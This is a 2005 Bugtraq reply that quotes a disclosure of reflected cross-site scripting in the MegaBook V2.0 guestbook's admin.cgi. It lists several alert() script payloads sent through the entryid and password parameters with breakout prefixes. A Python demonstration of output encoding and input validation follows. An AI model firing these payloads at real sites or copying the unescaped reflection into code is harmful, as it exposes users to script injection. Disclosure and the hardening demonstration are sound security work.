Re: MegaBook V2.0 - Cross Site Scripting Exploit

From: Morning Wood (wood_at_exploitlabs.com)
Date: 05/06/05

    Date: 6 May 2005 07:18:31 -0000
    To: bugtraq@securityfocus.com
    
    
    In-Reply-To: <20050505104551.23441.qmail@www.securityfocus.com>

    umm..
    http://exploitlabs.com/files/advisories/EXPL-A-2003-011-megabook-2.0.txt

    >Subject: MegaBook V2.0 - Cross Site Scripting Exploit
    >
    >
    >
    >The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site Scripting, which will allow the attacker to modify the post in the guestbook. The affected script is admin.cgi
    >
    >URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi)
    >
    >I have tested the script with the following query:
    >
    >?action=modifypost&entryid=">&lt;script&gt;alert('wvs-xss-magic-string-703410097');&lt;/script&gt;
    >
    >I have also tested the script with these POST variables:
    >
    >action=modifypost&entryid=66&password=&lt;script&gt;alert('wvs-xss-magic-string-188784308');&lt;/script&gt;
    >
    >action=modifypost&entryid=66&password='>&lt;script&gt;alert('wvs-xss-magic-string-486624156');&lt;/script&gt;
    >
    >action=modifypost&entryid=66&password=">&lt;script&gt;alert('wvs-xss-magic-string-1852691616');&lt;/script&gt;
    >
    >action=modifypost&entryid=66&password=>&lt;script&gt;alert('wvs-xss-magic-string-429380114');&lt;/script&gt;
    >
    >action=modifypost&entryid=66&password=</textarea>&lt;script&gt;alert('wvs-xss-magic-string-723975367');&lt;/script&gt;
    >
    >
    >Yours,
    >SpyHat
    >
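
The quoted report shows `entryid` and `password` being reflected with several context-breakout prefixes (`'>`, `">`, `>`, `</textarea>`). The following is an added example, not part of the original post and not MegaBook's code: it renders a hypothetical modifypost form with and without output encoding and counts the script tags that survive. The form markup, the `note` field, the function names and the sample inputs are assumptions made for illustration.

```python
import html
import re

# Constructed inputs: the breakout prefixes seen in the quoted report, each
# followed by a harmless marker tag (not the report's original strings).
MARKER = "<script>alert('marker')</script>"
SAMPLES = [p + MARKER for p in ("", "'>", '">', ">", "</textarea>")]

def parse_entryid(raw):
    """Allow-list validation: entryid is a record number, so digits only."""
    if not re.fullmatch(r"[0-9]{1,9}", raw or ""):
        raise ValueError("entryid must be numeric")
    return int(raw)

def render_form(entryid, password, escape=True):
    """Hypothetical modifypost form; the markup is assumed, not MegaBook's.

    escape=False models the reported behaviour (raw reflection);
    escape=True is the hardened form.
    """
    if escape:
        entryid = str(parse_entryid(entryid))
        # quote=True also encodes " and ', which matters inside attributes.
        password = html.escape(password, quote=True)
    # Attributes are always quoted: entity-encoding alone does not protect
    # an unquoted attribute value, where a space ends the value.
    return (
        '<form method="post" action="admin.cgi">\n'
        f'<input type="hidden" name="entryid" value="{entryid}">\n'
        f'<input type="text" name="password" value="{password}">\n'
        f'<textarea name="note">{password}</textarea>\n'
        '</form>'
    )

def injected_tags(page):
    """Count script tags in the rendered page; the template itself has none."""
    return len(re.findall(r"<script\b", page, flags=re.IGNORECASE))

def check_all():
    """Return (unsafe_hits, safe_hits) summed over every sample input."""
    unsafe = sum(injected_tags(render_form("66", s, escape=False)) for s in SAMPLES)
    safe = sum(injected_tags(render_form("66", s, escape=True)) for s in SAMPLES)
    return unsafe, safe

if __name__ == "__main__":
    print(check_all())
```

Each sample is reflected in two places (an attribute value and a textarea body), so the unescaped rendering carries two live tags per input while the escaped rendering carries none.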

